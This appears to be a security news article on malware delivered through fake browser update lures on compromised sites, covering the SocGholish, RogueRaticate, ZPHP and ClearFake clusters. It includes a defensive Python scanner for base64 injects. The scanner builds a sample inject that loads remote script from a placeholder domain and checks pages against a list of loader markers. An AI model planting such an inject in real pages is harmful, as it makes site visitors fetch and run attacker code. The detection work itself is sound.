Malware is being delivered to users' computers through fake browser update lures placed on websites that attackers have compromised.
When a user visits a compromised website, they may see a message claiming to come from the browser's vendor (for Chrome, Firefox, or Edge, for example) and urging them to update their browser. The link delivers malware instead of a legitimate browser update.
Although Proofpoint has not identified any threat actors directly sending emails containing malicious links, it has still observed compromised URLs in email traffic through various means, which reflects the complexity of the problem.
In each campaign, attackers use different techniques to filter traffic, which makes the activity difficult for researchers to detect and analyze. Despite the differences in method, all of these filters are effective at obscuring the attack.
While this filtering may limit the reach of the malicious payload, it also allows the attackers to keep access to the compromised sites for extended periods.
SocGholish:
Over several years there have been various discussions of the dangers of fake browser update lures, and among the threats discussed, SocGholish has been identified as the most prominent.
RogueRaticate/FakeSG:
A fraudulent browser update campaign, tracked as RogueRaticate or FakeSG, has been detected. This scheme injects complex, obfuscated JavaScript code into JavaScript files that already exist on the compromised site.
ZPHP/SmartApeSG:
ZPHP is the name Proofpoint initially gave to this cluster, which is also known as SmartApeSG. The operation inserts a small piece of script, commonly called an "inject," into the HTML of a compromised website.
This script is used to carry out various tasks, and it is often inserted without the knowledge or consent of the website owner.
ClearFake:
This cluster has been seen in ongoing campaigns, and several changes have been noticed in the brief time it has been under observation. Its inject is a script inserted into the hijacked website's HTML and encoded in base64.
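As an added illustration of how a defender might check a site's own HTML for the kind of base64-encoded inline inject described above (this is example code, not Proofpoint's or the article's), the scanner below decodes base64 strings found inside inline script blocks and flags those that decode to loader-like JavaScript. The sample page, the marker strings and the `update-check.invalid` domain are constructed assumptions, not real indicators.

```python
import base64
import re

# Constructed sample page, not a real compromised site: one ordinary inline script plus an
# "inject" whose logic is hidden in a base64 string that the page decodes and evaluates.
HIDDEN_JS = ("var s=document.createElement('script');"
             "s.src='https://update-check.invalid/loader.js';"  # placeholder domain
             "document.head.appendChild(s);")
SAMPLE_HTML = (
    "<html><head><script>window.dataLayer = [];</script></head><body><p>Welcome</p>"
    "<script>eval(atob('" + base64.b64encode(HIDDEN_JS.encode()).decode() + "'));</script>"
    "</body></html>"
)

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Strings that make decoded text look like a loader: it creates a script element,
# points it at a remote source, writes to the document or evaluates more code.
LOADER_MARKERS = ("createElement('script')", 'createElement("script")', ".src=",
                  "document.write", "eval(", "appendChild")

def decode_candidate(blob):
    """Return the decoded text if blob is valid base64 yielding readable text, else None."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if all(c.isprintable() or c in "\r\n\t" for c in text):
        return text
    return None

def find_base64_injects(html):
    """Report inline <script> blocks containing base64 that decodes to loader-like JavaScript.

    Each finding records the script's index in the page, the decoded text, the loader
    markers seen in it, and whether the block itself decodes/evaluates at runtime."""
    findings = []
    for idx, body in enumerate(SCRIPT_RE.findall(html)):
        for blob in B64_RE.findall(body):
            decoded = decode_candidate(blob)
            if decoded is None:
                continue
            markers = [m for m in LOADER_MARKERS if m in decoded]
            if markers:
                findings.append({"script": idx, "decoded": decoded, "markers": markers,
                                 "evaluated": "atob(" in body or "eval(" in body})
    return findings
```

Running `find_base64_injects(SAMPLE_HTML)` reports the second script block, with the decoded loader and the markers that matched, so an analyst can compare it against the site's known-good templates.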
Effectively detecting and preventing these threats can be challenging for any security team. To improve their chances of success, organizations can take a layered approach that includes setting up network detections, using the Emerging Threats ruleset, and deploying endpoint protection.
These measures can help to enhance the overall security posture of the organization and better safeguard against potential cyber threats.